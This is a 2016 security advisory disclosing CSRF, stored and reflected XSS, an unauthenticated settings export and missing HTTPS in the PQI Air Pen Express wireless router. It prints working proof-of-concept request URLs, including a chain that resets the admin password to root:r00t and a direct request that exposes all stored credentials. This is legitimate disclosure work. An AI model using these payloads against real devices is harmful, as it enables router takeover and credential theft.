_ _ _ _ | | | | | | ___ _ ____ _____| | | | __ _| |__ ___ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| | (_) | | \ V V / __/ | | | (_| | |_) \__ \ \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-03 www.orwelllabs.com Twitter:@orwelllabs magicword: d0ubl3th1nk1ng... Overview ======= Technical Risk: high Likelihood of Exploitation: medium Vendor: PQI Group Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and 6W51-0000R2XXX Credits: Discovered and researched by Orwelllabs Adivisory URL: http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html Issues ===== I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352) II. Multiple Stored Cross-site Scripting (CWE-79) III. Multiple Reflected Cross-Site Scripting (CWE-79) IV. Insecure Direct Request V. Insecure Default Permissions (CWE-276) VI. No SSL background ========= The smart lipstick-shaped PQI Air Pen express is the world's smallest wireless router/access point combo you can get today. PQI Air Pen express can be powered via an external adapter or a powered USB port on your computer and provide a excellent wireless expreience for everyone. I. Cross-Site Request Forgery (CSRF) (CWE-352) ``````````````````````````````````````````````````````````````````````` If a user visits a page bellow, this will set the administrative credential for PQI Air Pen express to "root:r00t"
The attacker can also abuse of the multiple XSS in this device to exploit this vulnerability, something like this to set the same cred 'root:r00t' http:// {airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22 http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!-- The following poc will set the credential to access point to "3groot:3g00t" (and of course, any other value could be set in this way.)
< -- 3G User <-- 3G Password
II. Stored Cross-site Scripting (CWE-79) `````````````````````````````````````````````````````````` "Wide Area Network (WAN) Settings" # PocParameter: "hostname" http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[ * STOREDXSS *]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= "Webs URL Filter Settings" # PocParameter: "addURLFilter" http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS* ]&addwebsurlfilter=Add Request in this page will show a pop-up with a content of javascript payload: http://{airpenXweb}/firewall/content_filtering.asp # Parameter: "addHostFilter" http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS* ]&addwebscontentfilter=Add III. Reflected Cross-Site Scripting (CWE-79) `````````````````````````````````````````````````````````````` Virtually all application inputs are vulnerable to cross-site scripting, since it is not carried out any validation of the data provided by the user. Bellow are some examples: "Basic Wireless Settings" # PocParameter: "mssid_0" http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[* XSS * ]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1 # PocParameter: "ssid" http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS * ]&security_mode=Disable&wzsecureAlgorithm=AES # PocParameter: "hostname" http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS -*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= # Parameter: "admpass" http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ] IV. Insecure Direct Request ```````````````````````````````````````` This device allows remote attackers to obtain sensitive information, including all credentials available via direct request to /cgi-bin/ExportSettings.sh. PoC: http://{airpenXweb}/cgi-bin/ExportSettings.sh V. Insecure Default Permissions (CWE-276) `````````````````````````````````````````````````````````````` In the device description (on the Vendor's site) it is very clear that the priority is to facilitate everything for you, including setting. Therefore it is not mandatory that a password is configured for the web interface and not to connect to the AP, this way you can find hundreds of these completely unprotected APs. VI. No SSL `````````````````` Any action, whether sensitive or not is transmitted in plain text because HTTPS is not used and no step. POST /goform/setSysAdm HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://xxx.xxx.xxx.xxx/adm/management.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 35 admuser=ORWL_user&admpass=ORWL_pass Timeline ======= 2015-10-25 - Issues discovered 2015-11-04 - Vendor contacted 2015-12-12 - Another attempt to contact the Vendor... 2016-02-26 - Public Disclosure * There is no easy way to contact the vendor. Emails sent remain unanswered and forms site contacts as well.